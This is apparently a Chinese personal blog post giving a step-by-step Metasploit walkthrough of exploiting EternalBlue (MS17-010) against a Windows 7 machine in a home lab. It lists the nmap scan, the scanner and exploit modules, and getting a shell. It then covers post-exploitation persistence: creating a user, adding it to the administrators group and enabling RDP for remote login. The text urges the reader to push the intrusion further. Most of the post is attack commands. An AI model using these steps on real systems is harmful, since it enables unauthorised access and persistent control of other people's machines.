Metasploit利用永恒之蓝ms17-010漏洞入侵win7过程

晚上在看头条的时候,看到了一篇用ms17-010永恒之蓝漏洞来证明qq安全管家和360安全管家谁的防御能力更强的视频,于是想着自己也来动手试一试,整体来说来metasploit上手非常快,操作步骤也不是很多,熟悉的话就很快的熟能生巧了。   

一共试验了两次,第一次失败了,在最终的结果返回的是FAIL,这台主机445端口是开放的,在入侵的前几步过程中也是提示可以被入侵的,但是最终提示不行,也有可能是因为打了对应的补丁了吧,于是用另一台虚拟机来实验,结果成功了,接下来说下具体的试验过程:

第一步,利于nmap查看被入侵主机是否开启445端口
nmap -sS -sV -Pn 192.168.1.22根据返回结果可以看到是存在445端口的

然后打开metasploit或者在终端输入msfconsole

有趣的是每次启动metasploit时界面都会不同,这可能是属于程序员的浪漫了吧!?

然后先利用auxiliary/scanner/smb/smb_ms17_010模块进行漏洞分析,验证445端口是否能够被入侵

使用show options查看ms17-010漏洞的详细信息,这里可以看到当前设置的端口为445,但RHOST的位置为空,这里需要设置下ip,对应的ip就是你的被入侵主机的ip
set RHOST  192.168.1.22

执行run,能够看到xxx主机看起来有可被利用的ms17-010的永恒之蓝漏洞,这里就基本上可以确认这台主机是可以被入侵的

执行use exploit/windows/smb/ms17_010_eternalblue使用ms17-010攻击模块准备攻击

还可以通过show targets查看哪些系统的主机可以被入侵

可以看到win7和server2008 R2系列都是可以的,对win7试验完的朋友还可以对server 2008R2的来试一下。
接下来再一次的设置被攻击的主机ip,set RHOST  192.168.1.22

接下来run 等待结果就行了,在执行过程中如果看到出现了WIN信息的时候就表示已经成功了

然后输入shell命令进入windows的cmd命令界面,之后可以通过在桌面建立个文件夹来证明入侵成功的

更新时间2020年10月5日15:11:56

上面的记录是在kali2019版本上进行的,今天在2020版本的kali上进行发现了以下变化:

1、在入侵结束后不再需要回车后才显示被入侵主机的操作界面,而是直接显示meterpreter,需要通过输入shell获取到windows的cmd命令

如果需要返回到meterpreter命令输入exit即可

2、在kali2019中入侵主机后,创建文件夹测试时的命令是md 文件夹名称,在2020版本的kali中md命令失效,变成了mkdir 文件夹名称

上文只是通过简单的建立文件夹来验证入侵是成功的,接下来可以通过在被入侵主机上建立账号并远程的方式进一步完成入侵!
上面既然已经进入到了被入侵主机的cmd界面了,接下来添加自己的用户就可以了,执行net user 账号 密码 /add

添加结束可以用net user来验证账户是否添加成功,能看到添加的账号已经存在了

接下来对此账号进行提权操作,执行net localgroup administrators 账号名 /add(将账号加入到本地管理组并赋予管理员权限)

这个时候可以连接到被测主机看该账号是否为管理员权限

这个时候其实已经能做很多事情了,但为了更直观的看到测试效果,接下来开启被测主机的远程RDP协议,通过远程登录的方式进入到被入侵主机,退出shell界面返回到meterpreter命令界面,执行run post/windows/manage/enable_rdp开启远程协议,默认3389端口

☛远程测试效果